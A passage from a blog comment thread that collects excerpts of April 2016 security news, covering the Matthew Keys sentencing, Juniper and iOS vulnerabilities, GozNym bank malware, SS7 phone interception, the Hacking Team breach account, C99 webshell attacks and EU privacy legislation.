But the evidence brought at trial with respect to the total loss—and which was likely cited in the sealed presentence report prepared by the probation office—is tied to the Tribune Company’s reaction in the wake of the hack, including an extensive assessment of the entire CMS, as well as emails, phone calls, and meetings made by both journalists and highly-paid executives.
The story that the prosecution told at trial was not of a one-off, regretful copy/paste into a chatroom, but rather of a weeks-long harassment campaign launched at a former employer
In sentencing Keys, Judge Mueller said that the effect of the defacement was “relatively modest and did not do much to actually damage the reputation of that publication,” but that she could not ignore that his “intent was to wreak further damage which could have had further consequences.”
Tomi Engdahl says:
BT is recruiting 900 security pros to tackle growing cybercrime threat
170 graduates and apprentices to be hired as part of recruitment programme
http://www.theinquirer.net/inquirer/news/2454506/bt-is-recruiting-900-security-pros-to-tackle-growing-cybercrime-threat
BROADBAND BOTHERER BT is on the hunt for 900 cyber security professionals over the in what the firm says is a drive to protect consumers, businesses and governments from the growing threat of cyber crime.
BT said that it already employs more than 2,500 security professionals but will hire 170 graduates and apprentices as part of the recruitment intake to meet the growing demand for cyber security services.
The new recruits, which it will hire over the next 12 months, will work across range of cyber security and related support roles. They will undergo training in BT’s Security Academy in a range of areas, including physical security, penetration testing, threat intelligence, risk management, security operations and sales.
The majority of the roles will be based in the UK
“A number of high-profile security and data breaches have dominated the headlines in recent months, and this has led to a surge in interest from consumers and IT departments wanting to know how best they can protect themselves in the digital world,”
Tomi Engdahl says:
Juniper bleeding data and money: slaps Band-Aids all over Junos OS and warns markets
Security fixes for privilege escalation, DoS, TLS spoofing and more
http://www.theregister.co.uk/2016/04/14/juniper_drops_a_bunch_of_junos_os_security_fixes/
Juniper’s code reviewers have been hard at work, and have shipped a bunch of security bug-fixes.
First up: the company has turned up a bunch of Junos OS privilege escalation vulnerabilities that need patching. As the advisory states, CVE-2016-1271 covers a set of CLI commands that can be exploited to get root access to the affected system.
As well as patching vulnerable systems, Juniper reminds sysadmins that CLI access should always be restricted to trusted hosts (as well as highly trusted sysadmins).
The company’s also rolled out a fix to a bunch of bugs in curl and libcurl.
Tomi Engdahl says:
iOS ‘date bug’ can be exploited over Wi-Fi using NTP
Party like it’s 1970
http://www.theregister.co.uk/2016/04/14/ios_date_bug_can_be_exploited_over_wifi_using_ntp/
Back in February, Apple nearly fixed the “1970” date bug that bricked iDevices running 64-bit iOS 8 or higher when their clocks were set to January 1, 1970.
Apple blushed red and issued a patch, but according to PacketSled’s Matt Harrigan and Critical Assets’ Patrick Kelley, “you missed a spot”: the bug can still be triggered remotely.
The problem is that the network time protocol (NTP) hasn’t caught up with sensible paranoia, and malicious parties can spoof time server domains.
As this PacketSled blog post explains, if the iDevice retrieves the bad day’s timestamp from a server spoofing time.apple.com, it bricks.
It’s a cinch to run up a suitable NTP server: the researchers show how in the YouTube video below, using a Raspberry Pi to make a malicious Wi-Fi hotspot.
Tomi Engdahl says:
Lauri Love backdoor forced-decryption case goes to court in UK
Why use the ‘gimme password or else’ law when you can evade even that?
http://www.theregister.co.uk/2016/04/13/lauri_love_compelled_decryption_case/
Alleged hacktivist Lauri Love appeared in a London court on Tuesday in a case that could establish new powers for UK police to compel criminal suspects into handing over encryption keys.
Love, 31, faces potential extradition to the US over his alleged involvement in #OpLastResort – the online protests that followed the persecution and untimely death of activist Aaron Swartz.
US prosecutors want to try Love over alleged attacks against the US Army (Missile Defence Agency), Federal Reserve Bank and the FBI during 2012 and 2013.
Tomi Engdahl says:
Hackers hacking hackers to knacker white hat cracker trackers
‘These Russians speak really good Farsi’ and other signs thieves lack honour
http://www.theregister.co.uk/2016/04/14/there_is_no_honour_among_thieves/
ACSC2016 Malware writers are selling each other out to white hats and hacking through each other’s infrastructure to frame rivals, Shadowserver’s Richard Perlotto says.
The treachery is a bid to prompt Shadowserver and fellow malware investigators to take down their rival’s command and control servers and domains.
Perlotto says they are happy to oblige.
“We are seeing A-level actors hacking through B-level and C-level actors, sometimes through two or three of em,” Perlotto told the Australian Cyber Security Conference in Canberra today.
“The criminals are pointing each other to us saying ‘hey this arsehole’s over here, take him out’ and we do.”
“They will dox each other too and we benefit from that.”
Tomi Engdahl says:
Burr-Feinstein Anti-Encryption Bill Is Officially Released
https://yro.slashdot.org/story/16/04/14/0351212/burr-feinstein-anti-encryption-bill-is-officially-released
Senators Richard Burr and Dianne Feinstein released the official version of their anti-encryption bill today after a draft appeared online last week. The bill, titled the Compliance with Court Orders Act 2016, would require tech firms to decrypt customers’ data at a court’s request. The bill is not expected to get anywhere in the Senate. President Obama has also indicated that he will not support the bill, Reuters reports. The bill requires legislation requires communications services to backdoor their encryption in order to provide “intelligible information or data, or appropriate technical assistance to obtain such information or data.” Sen. Feinstein stated
Tomi Engdahl says:
The EU is trying to bridle the NSA’s data collection
between the European Union member states and the US turning a new page Privacy Shield agreement, which would define the rules on data transfer and control over the Atlantic. The Commission has received from the Member States a lot of corrections to the original text of the agreement, but the agreement still trying to get into force within a few months.
The whole project was inspired by Edward Snowden revealed the US with virtual safety authority, ie the NSA’s practice as with all other than Americans can be monitored by means of mass phishing. In practice, the NSA can capture, analyze, and monitor all European data traffic.
The new Provacy Shield Agreement links European Commission wants to definitely get rid of such mass spying.
European point of view the main problem is the NSA. It is not correctly controlled by anyone.
The work under the contract is important not only for citizens but also for businesses. Online business and commerce knows no boundaries.
Source: http://etn.fi/index.php?option=com_content&view=article&id=4258:eu-yrittaa-suitsia-nsa-n-datankeruuta&catid=13&Itemid=101
Tomi Engdahl says:
Nick Statt / The Verge:
Obama appoints former NSA director Keith Alexander, Uber CSO, MasterCard CEO, and Corporate VP of Microsoft Research to cybersecurity panel
Obama appoints execs from MasterCard, Uber, and Microsoft to cybersecurity panel
As well as former NSA director Keith Alexander
http://www.theverge.com/2016/4/13/11427182/president-obama-cybersecurity-panel-uber-microsoft-mastercard-nsa
The White House today released a list of names President Barack Obama will appoint to his new Commission on Enhancing National Cybersecurity. The panel, established this year as part of Obama’s $19 billion proposal to tighten defenses against hacking threats, seeks to tap industry experts outside the government for cybersecurity recommendations for both the public and private sectors.
The entire budget proposal, totaling $4 trillion, is for the 2017 fiscal year starting October 1st. The Obama Administration has said in the past that the $19 billion for cybersecurity, a 35 percent bump in spending, should garner bipartisan support considering it was prompted in part by a massive breach of the government’s personnel office last year.
Tomi Engdahl says:
CIA Is Investing Heavily In Firms That Do Social Media Mining and Surveillance
https://yro.slashdot.org/story/16/04/15/1344219/cia-is-investing-heavily-in-firms-that-do-social-media-mining-and-surveillance?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot%2Fto+%28%28Title%29Slashdot+%28rdf%29%29
Lee Fang, reporting for The Intercept, lists more than three-dozen companies that have received funding from CIA. In-Q-Tel, the CIA’s venture capital firm, the publication claims, has invested in 38 companies that research on “social media mining and surveillance.”
The CIA Is Investing in Firms That Mine Your Tweets and Instagram Photos
https://theintercept.com/2016/04/14/in-undisclosed-cia-investments-social-media-mining-looms-large/
Tomi Engdahl says:
Whistleblowers Fear Prosecution Under New European Trade Secrets Law
https://yro.slashdot.org/story/16/04/14/205204/whistleblowers-fear-prosecution-under-new-european-trade-secrets-law
The European Parliament is debating the Trade Secrets Protection Act critics say threatens to turn whistleblowers into criminals. The bill is aimed to protect European companies from corporate spying by their rivals in other parts of the world. But critics fear that the legislation will make it possible for corporations to define any information they do not want released as a trade secret, and then prosecute journalists or whistleblowers who release it to the public.
Whistleblowers fear prosecution under new European Trade Secrets law
http://www.bbc.com/news/business-36041738
The European Parliament is debating a bill on Thursday critics say threatens to turn whistleblowers into criminals.
The aim of the Trade Secrets Protection Act is to protect European companies from corporate spying by their rivals in other parts of the world.
But critics say journalists and whistleblowers could be criminalised if they publish information that companies deem to be secret.
More than half a million people have signed a petition against the bill.
Industrial espionage is a major worry in the corporate world, and other countries have already put laws in place to protect their companies.
Offenders in the US can be jailed for up to fifteen years, and a quarter of prosecutions involved people connected with China.
According to the European Commission, one in five companies in Europe suffered an attempt to steal trade secrets in the last 10 years.
Fears
But opponents of the plans in Europe say the bill is not specific enough about the type of information it is trying to protect.
They fear that the legislation will make it possible for corporations to define any information they do not want released as a trade secret, and then prosecute journalists or whistleblowers who release it to the public.
Misinterpretation
The bill’s supporters say there is nothing to worry about because it contains a defence for those who release information exposing criminal wrongdoing or who are acting in the public interest.
But not everything exposed by the Panama papers was illegal – much of it was merely embarrassing to the people who were named.
Tomi Engdahl says:
Swiss banker whistleblower: CIA behind Panama Papers
Bradley Birkenfeld is the most significant financial whistleblower of all time, so you might think he’d be cheering on the disclosures in the new Panama Papers leaks. But today, Birkenfeld is raising questions about the source of the information that is shaking political regimes around the world.
In an exclusive interview Tuesday from Munich, Birkenfeld said he doesn’t think the source of the 11 million documents stolen from a Panamanian law firm should automatically be considered a whistleblower like himself. Instead, he said, the hacking of the Panama City-based firm, called Mossack Fonseca, could have been done by a U.S. intelligence agency.
“The CIA I’m sure is behind this, in my opinion,” Birkenfeld said.
Birkenfeld pointed to the fact that the political uproar created by the disclosures have mainly impacted countries with tense relationships with the United States.
Sources:
http://www.tivi.fi/rss/arvio-he-ovat-panaman-tietovuodon-takana-6541491
http://www.cnbc.com/2016/04/12/swiss-banker-whistleblower-cia-behind-panama-papers.html
Tomi Engdahl says:
Ensuring network cyber security
http://www.controleng.com/single-article/ensuring-network-cyber-security/795ff533f8c4d3713399e2e49a5f8197.html
Good cyber security requires understanding network risks, threats, and the technical safeguards that can prevent unwanted plant data intrusions.
“What’s the worst that could happen?” This question is at the heart of many plantwide discussions. Deliberations on safety interlocks, alarm rationalization, hazard analyses, job safety plans, and process equipment design routinely center on this premise. Why, then, do some facilities have a lackadaisical approach to the layout and protection of their network security?
At risk
Some plants do well from a cyber security standpoint. Other sites have used such stringent security measures as the cryptic “text Billy for the wireless password” method. Seriously. Different plants run the gamut, from requiring a Transportation Worker Identification Credential card upon entry to requiring the driver of a vehicle to roll down the window and shout a number to the guard that supposedly corresponds to a vehicle pass list somewhere. Where does your plant fall in this spectrum? Is your network password written on a whiteboard in the control room or emailed in halves to two trusted supervisors?
Before discussing strategies to isolate and protect plant networks, consider the most common cyber attacks and the simplest guards against them.
Tomi Engdahl says:
Thomas Fox-Brewster / Forbes:
Researchers uncover GozNym, a malware that is a hybrid of Nymaim and Gozi that has stolen $4M from customers of 24 US and Canadian banks in just 3 days
Eastern European Cyber Crooks Raid US Banks For $4 Million In Just 3 Days
http://www.forbes.com/sites/thomasbrewster/2016/04/14/goznym-bank-malware-steals-4-million-american-banks/#39cb157d493d
In early April, cybercriminals believed to be of Eastern European origin unleashed a malware that stole $4 million from more than 24 American and Canadian banks in just a few days, security researchers at IBM said today. The hackers combined code from two malware types, known as Nymaim and Gozi, to create GozNym, a Trojan both persistent and powerful
a variant of Gozi, the source code of which leaked in 2010
Gozi, another version of which called Gozi ISFB was leaked towards the end of 2015, was designed to inject scripts into browsers so that when a victim visited their banking site, logins would be hoovered up.
Another source with knowledge of the malware, who asked to remain anonymous, said GozNym was also active in Asia and Europe but appeared to target American banks with overseas operations.
Tomi Engdahl says:
Andy Greenberg / Wired:
Researchers detail how they brute forced shortened URLs from OneDrive and Google Maps to access private information; Microsoft and Google respond — Researchers Crack Microsoft and Google’s Shortened URLs to Spy on People — For anyone with minimalist tastes or an inability …
Researchers Crack Microsoft and Google’s Shortened URLs to Spy on People
http://www.wired.com/2016/04/researchers-cracked-microsoft-googles-shortened-urls-spy-people/
For anyone with minimalist tastes or an inability to use copy-paste keyboard shortcuts, URL shorteners may seem like a perfectly helpful convenience. Unfortunately, the same tools that turn long web addresses into a few characters also offer the same conveniences to hackers—including any of them motivated enough to try millions of shortened URLs until they hit on the one you thought was private.
That’s the lesson for companies including Google, Microsoft, and Bit.ly in a paper published today by researchers at Cornell Tech. The researchers’ work demonstrates the unexpected privacy-invasive potential of “brute-forcing” shortened URLs: By guessing at shortened URLs until they found working ones, the researchers say that they could have pulled off tricks ranging from spreading malware on unwitting victims’ computers via Microsoft’s cloud storage service to finding out who requested Google Maps directions to abortion providers or drug addiction treatment facilities.
Tomi Engdahl says:
Sharyn Alfonsi / CBS News:
On 60 Minutes, security expert Karsten Nohl eavesdrops on cellphone calls and texts knowing just the phone’s number by hacking SS7, a global carrier protocol
Hacking Your Phone
Sharyn Alfonsi reports on how cellphones and mobile phone networks are vulnerable to hacking
http://www.cbsnews.com/news/60-minutes-hacking-your-phone/
A lot of modern life is interconnected through the Internet of things — a global empire of billions of devices and machines. Automobile navigation systems. Smart TVs. Thermostats. Telephone networks. Home security systems. Online banking. Almost everything you can imagine is linked to the world wide web. And the emperor of it all is the smartphone. You’ve probably been warned to be careful about what you say and do on your phone, but after you see what we found, you won’t need to be warned again.
We heard we could find some of the world’s best hackers in Germany.
Karsten Nohl: What hacking story?
They were able to do it by exploiting a security flaw they discovered in Signaling System Seven — or SS7. It is a little-known, but vital global network that connects phone carriers.
Sharyn Alfonsi: Congressman thank you so much for helping us…
Every person with a cellphone needs SS7 to call or text each other. Though most of us have never heard of it.
Nohl says attacks on cellphones are growing as the number of mobile devices explodes. But SS7 is not the way most hackers break into your phone–
Those hacks are on display in Las Vegas.
John Hering: It’s proving what’s possible. Any system can be broken it’s just knowing how to break it.
John Hering: I think that most people have not really thought about their phones as computers. And that that’s really starting to shift.
All Karsten Nohl’s team in Berlin needed to get into the congressman’s phone was the number. Remember SS7 –that little-known global phone network we told you about earlier?
Karsten Nohl: I’ve been tracking the congressman.
There’s a flaw in it that allowed Nohl to intercept and record the congressman’s calls and track his movements in Washington and back home.
Karsten Nohl: The congressman has been in California, more specifically the L.A. area, zoom in here a little bit, Torrance.
The SS7 network is the heart of the worldwide mobile phone system. Phone companies use SS7 to exchange billing information. Billions of calls and text messages travel through its arteries daily. It is also the network that allows phones to roam.
Sharyn Alfonsi: Are you able to track his movements even if he moves the location services and turns that off?
Karsten Nohl: Yes. The mobile network independent from the little GPS chip in your phone, knows where you are. So any choices that a congressman could’ve made, choosing a phone, choosing a pin number, installing or not installing certain apps, have no influence over what we are showing because this is targeting the mobile network. That of course, is not controlled by any one customer.
Karsten Nohl and his team were legally granted access to SS7 by several international cellphone carriers. In exchange, the carriers wanted Nohl to test the network’s vulnerability to attack. That’s because criminals have proven they can get into SS7.
Karsten Nohl: Mobile networks are the only place in which this problem can be solved. There is no global policing of SS7. Each mobile network has to move– to protect their customers on their networks. And that is hard.
“We live in a world where we cannot trust the technology that we use.”
Nohl told us the SS7 flaw is a significant risk mostly to political leaders and business executives whose private communications could be of high value to hackers. The ability to intercept cellphone calls through the SS7 network is an open secret among the world’s intelligence agencies — -including ours — and they don’t necessarily want that hole plugged.
Tomi Engdahl says:
US-CERT advice says kill Quicktime for Windows, quickly
Unsupported software with known bugs has no place anywhere
http://www.theregister.co.uk/2016/04/18/uscert_advises_quicktime_deletion/
US-CERT has echoed The Register’s advice to the effect that if you’re running Quicktime for Windows, it’s time to delete it. Right now.
The United States’ Department of Homeland Security’s Computer Emergency Response Team’s advice comes after Apple took Quicktime for Windows for its long drive down a country road.
As noted by Trend Micro at the time, that leaves a couple of wonderful bugs – ZDI-16-241 and ZDI-16-242 – to live forever.
Tomi Engdahl says:
Google punts freebie DDoS shield to hacks, human rights worthies
Reverse proxying traffic might save headaches
http://www.theregister.co.uk/2016/02/25/google_freebie_ddos_shield/
Google has launched a free service to protect news websites against DDoS attacks.
Project Shield will also be offered to human rights and election monitoring websites as a way of fending off increasingly commonplace site-swamping DDoS assaults. Google is offering to “reverse proxy” qualifying websites’ traffic through Google’s cloud platform. Publishers can opt in to route all their traffic through Google by making changes in their DNS settings.
Google has promised not to use log info in order to serve advertising. The advantage for publishers is that a successful attack would effectively have to be strong enough to destabilize Google’s cloud instead of simply knocking over a WordPress installation, a much easier proposition for attackers.
One disadvantage is that sites would become inaccessible from countries that block all Google IP addresses. In many such cases, the sites might be censored anyway, and reachable only through VPNs or Tor. Publishers would also have to put their faith in Google and its security.
Project Shield
https://jigsaw.google.com/products/project-shield/
Every day, independent news, human rights, and election monitoring sites around the world are taken offline and silenced by attacks on their servers. Project Shield uses Google’s technology to protect websites at risk and keep them online.
Protecting websites from digital attacks
Background
A distributed denial of service attack (DDoS) is a type of digital attack where a hacker exploits thousands, or even millions, of computers and tricks them into visiting a website at the same time. The resulting flood of traffic often overwhelms servers and the website goes offline.
Independent news sites, election monitors, and human rights groups often don’t have the resources to protect themselves from attacks, which makes them an easy target for people who wants to censor free expression.
Project Shield uses technology called a reverse proxy, which allows a webmaster to serve their site through Google infrastructure for free, providing a “shield” against would-be attackers. So far we’ve protected hundreds of news organizations and human rights websites that have faced attacks aimed at censoring free expression. By protecting these sites, we’ve helped to keep vital information online during elections, major crises and conflicts.
Tomi Engdahl says:
EU Approves Strict New Privacy Rules
https://slashdot.org/story/16/04/17/0022208/eu-approves-strict-new-privacy-rules
The EU just approved a new set of strict rules governing privacy and data protection, which include a right to be forgotten and to “clear and affirmative consent” for any processing of private data, as well as the right to know when data has been compromised. Culminating more than four years of work, “The reform will replace the current data protection directive, dating back to 1995 when the internet was still in its infancy,” the EU said in a statement
Data protection reform – Parliament approves new rules fit for the digital era
http://www.europarl.europa.eu/news/en/news-room/20160407IPR21776/Data-protection-reform-Parliament-approves-new-rules-fit-for-the-digital-era
New EU data protection rules which aim to give citizens back control of their personal data and create a high, uniform level of data protection across the EU fit for the digital era was given their final approval by MEPs on Thursday. The reform also sets minimum standards on use of data for policing and judicial purposes.
“The regulation will also create clarity for businesses by establishing a single law across the EU. The new law creates confidence, legal certainty and fairer competition”, he added.
The new rules include provisions on:
a right to be forgotten,
“clear and affirmative consent” to the processing of private data by the person concerned,
a right to transfer your data to another service provider,
the right to know when your data has been hacked,
ensuring that privacy policies are explained in clear and understandable language, and
stronger enforcement and fines up to 4% of firms’ total worldwide annual turnover, as a deterrent to breaking the rules.
New rules on data transfers to ensure smoother police cooperation
The data protection package also includes a directive on data transfers for policing and judicial purposes. It will apply to data transfers across borders within the EU as well as, for the first time, setting minimum standards for data processing for policing purposes within each member state.
Next steps
The regulation will enter into force 20 days after its publication in the EU Official Journal. Its provisions will be directly applicable in all member states two years after this date.
Member states will have two years to transpose the provisions of the directive into national law.
Tomi Engdahl says:
Hacker’s Account of How He Took Down Hacking Team’s Servers
https://it.slashdot.org/story/16/04/17/1616237/hackers-account-of-how-he-took-down-hacking-teams-servers
FinFisher, the hacker that broke into Italian firm Hacking Team, has published a step-by-step account of how he carried out the attacks, what tools he used, and what he learned from scouting HackingTeam’s network. Published on PasteBin, the attack’s timeline reveals he entered their network through a zero-day exploit in an (unnamed) embedded device, accessed a MongoDB database that had no password, discovered backups in the database, found a BES admin password in the backups, and eventually got admin access to the Windows Domain Server. From here, it was easy to reach into their email server and steal all the company’s emails, and later access Git repos and steal the source code of their surveillance software.
Hacking Team Hacked, Attackers Grab 400GB of Internal Data
https://it.slashdot.org/story/15/07/06/1228240/hacking-team-hacked-attackers-grab-400gb-of-internal-data
Phineas Fisher’s Account of How He Broke Into Hacking Team Servers
http://news.softpedia.com/news/finfisher-s-account-of-how-he-broke-into-hackingteam-servers-503078.shtml#ixzz46AVGUjmL
Almost a year after carrying out his attacks, the hacker behind the Hacking Team data breach has published a step-by-step explainer on how he breached the company’s servers and stole all their data.
Known as Phineas Fisher (past moniker FinFisher), the hacker posted a PasteBin over the weekend, in which he reveals how the attack unfolded, the tools he used, and provided a tutorial for h@ckZ0r wannabees who want to enter the world of top-level hacking.
“Zero-day exploit in an embedded device was initial entry point”
The hacker revealed that the entry point into Hacking Team’s infrastructure was a zero-day root exploit in an embedded device deployed inside the company’s corporate network. He declined to name the exact nature and purpose of the embedded device.
Phineas Fisher says he spent a lot of time scanning the company’s network and even exposed a vulnerability in the Hacking Team’s Joomla-based frontend website, discovered issues with their email server, a couple of routers, and some VPN appliances. Despite the large attack surface, he concluded that the zero-day exploit he identified was much more reliable for further attacks.
After writing and deploying a backdoored firmware to the vulnerable embedded device, he then waited, listening to internal traffic, scanning and mapping the local infrastructure.
“MongoDB databases left without authentication strike again!”
“Hacker discovers secret network where the RCS source code was hosted”
After reading some of the stolen emails, Phineas Fisher understood that there was another hidden network inside the company’s infrastructure, where the Hacking Team kept the source code of their RCS (Remote Control System) surveillance software.
HackBack
http://pastebin.com/raw/0SNSvyjJ
Tomi Engdahl says:
Security This Week: Tax Day Is Near, and the IRS Is as Hackable as Ever
http://www.wired.com/2016/04/security-week-tax-day-near-irs-hackable-ever/
There’s rarely a boring moment in the security world.
a former journalist, Matthew Keys, was sentenced to two years in jail for aiding Anonymous hackers who briefly defaced a headline on the LA Times website
Then the world learned that the US government paid “grey hat” hackers for information about an iOS 9 software vulnerability, which the feds then used to access the locked iPhone that belonged to a San Bernardino terrorist.
URL shorteners are actually opening themselves up to malware attacks and online spying
It’s Tax Time, But the IRS Still Sucks at Cybersecurity
IRS Chief John Koskinen admitted Tuesday that unless the agency is given permission to pay digital security professionals more than the currently approved salary rates, those much-needed experts will take jobs elsewhere.
Security technologist Bruce Schneier noted this week that the annual Government Accountability Office report on the state of IRS security outlines 43 recommendations for fundamental improvements to IRS security. This is a big deal because of how sensitive taxpayer data is—cybercriminals can easily use it to commit serious fraud.
But taxpayers shouldn’t only worry about the IRS’ own lax security. Ars Technica reported this week that millions of Americans have received fraudulent robocalls from scammers outside the United States claiming to be the IRS.
The White House Has a Brand New Cybersecurity Commission
Tomi Engdahl says:
The Philippines election hack is ‘freaking huge’
http://www.wired.co.uk/news/archive/2016-04/14/philippines-data-breach-fingerprint-data
A massive data breach in the Philippines appears to contain millions of fingerprint records, despite officials claiming the leak “doesn’t include biometrics”. But one fingerprint specialist has questioned how useful the leaked data would be to criminals.
Earlier this month security researchers uncovered what appears to be the largest ever government data breach, affecting 55 million voters in the Philippines. The data, which has been widely distributed on both the dark and clear web, comprises of 228,605 email addresses; 1.3 million passport numbers and expiry dates of overseas Filipino voters; and 15.8 million fingerprint records.
“If you lose a password you can change it,” security expert Troy Hunt told WIRED. “You can’t change a fingerprint. Short of using a belt sander, it’s not going to be much fun.”
Five fields in the main 338GB database obtained by hackers relate to fingerprint data
But the biometric data may be utterly useless without access to a computer system that can interpret it, fingerprint expert Chris Johnson told WIRED. “Very often the computer systems developed for countries are bespoke,”
When stored digitally, fingerprint data is typically converted into a unique code relating to the patterns known as minutiae. Computer software measures the distance and angle between a series of points, creating a unique map of the print. This code can then be matched whenever that finger is scanned again. The Philippines started collecting voter fingerprint data in 2015
“If you lose a password you can change it. You can’t change a fingerprint”
Troy Hunt, Security expert
Tomi Engdahl says:
Idiot millennials are saving credit card PINs on their mobile phones
Cleartext passwords are bad, kids, mmmkay?
http://www.theregister.co.uk/2016/04/18/storing_passwords_smartphone_bad_mkay/
More than one in five 18-24 year olds (21 per cent) store PINs for credit or debit cards on their smartphones, tablets or laptops, according to research conducted by Equifax in conjunction with Gorkana.
In the same survey of 500 people across all ages more than a third young adults (38 per cent) said they also use their personal devices to store online passwords.
The habit leaves young adults more exposed to online scams in cases where their devices are stolen or hacked.
Once a device is breached, fraudsters can use data stored on it to access accounts, and also use a combination of data found to try to steal an individual’s identity.
Tomi Engdahl says:
Ancient apps leave 3.2 million PCs open to ransomware attacks
It mostly affects schools, but fixes are thankfully on the way.
http://www.engadget.com/2016/04/16/jboss-ransomware-exploit/
Criminals are relying on some particularly insidious ways to spread ransomware. Cisco’s Talos group has discovered that intruders are taking advantage of vulnerabilities in old versions of Follett library management software (specifically, the associated JBoss web servers) to install backdoors and slip in ransom code. The attack has ‘only’ put 2,100 backdoors in place, but about 3.2 million systems are known to be at risk — many of them at grade schools. Suffice it to say that many educators don’t want to pay a hefty sum just to regain access to their library data.
Tomi Engdahl says:
C99 Webshell Increasingly Used in WordPress Attacks
http://www.securityweek.com/c99-webshell-increasingly-used-wordpress-attacks
IBM Security has warned WordPress website administrators about a sharp increase in the number of attacks leveraging a variant of a PHP webshell called C99.
IBM reported spotting nearly 1,000 attacks in February and March, which represents a 45 percent increase compared to the previous period. The C99 variant used in these attacks is currently detected by 37 security products based on its signature.
The attack starts with a file named pagat.txt, which contains an obfuscated PHP script, being uploaded to the targeted website. By obfuscating the script, cybercriminals hope to increase its chances of evading detection and bypassing Web application firewalls.
Once the script is decoded and executed on the victim’s server, an email is sent to the attacker, informing them that the target has been compromised.
The attacker can then access the webshell from a browser and start executing shell commands on the server. The webshell also allows malicious actors to upload files that can be used to perform various actions.
A Google search shows that the pagat.txt file is currently present on hundreds of websites. However, only 9 of 68 security products on VirusTotal detected the script as being malicious.
Webshells are typically uploaded to WordPress websites via vulnerabilities in the content management system (CMS) or third-party plugins
Tomi Engdahl says:
Microsoft Details Security Responsibilities for Azure Cloud Customers
http://www.securityweek.com/microsoft-details-security-responsibilities-azure-cloud-customers
Microsoft Publishes White Papers on Incident Response and Shared Responsibility for Azure Cloud Customers
Incident response is a hot topic. The cloud is a hot topic. But how do you respond to incidents in the cloud for which you may have no knowledge? It’s a difficult issue that could cause problematic relations between enterprises and the big clouds like Microsoft Azure, Amazon Web Services (AWS) and Google.
Now Microsoft is setting the ground rules with two new documents: Shared Responsibilities for Cloud Computing, and Microsoft Azure Security Response in the Cloud.
The first specifies Microsoft’s view of its own responsibilities (and therefore, by omission, the enterprise CISO’s responsibilities); while the second gives an outline of how Microsoft will actually respond.
Microsoft believes that there is a fairly fundamental split in responsibility. The cloud provider is responsible for the physical aspects of the cloud IT infrastructure and the software that it provides. The customer is responsible for its own data.
It sounds simple, but there will inevitably be problems. Forensic proof will become important. If a customer’s data is modified via a flaw in Microsoft software that Microsoft doesn’t recognize, there could be issues.
This is where the CISO needs to understand both documents – because there are some incidents that Microsoft will not report to the customer.
And as every CISO knows, visibility into the cloud is not always 20/20.
Having suggested that Microsoft’s definition of its and its customers’ responsibilities could cause operational difficulties, the remainder of the Incident management document is informative and valuable. It first outlines the roles that should be involved in a response, and then describes the plan itself.
The plan itself involves five stages: Detect, Assess, Diagnose, Stabilize, and Close.
Tomi Engdahl says:
Ensuring network cyber security
http://www.controleng.com/single-article/ensuring-network-cyber-security/795ff533f8c4d3713399e2e49a5f8197.html
Good cyber security requires understanding network risks, threats, and the technical safeguards that can prevent unwanted plant data intrusions.
“What’s the worst that could happen?” This question is at the heart of many plantwide discussions. Deliberations on safety interlocks, alarm rationalization, hazard analyses, job safety plans, and process equipment design routinely center on this premise. Why, then, do some facilities have a lackadaisical approach to the layout and protection of their network security?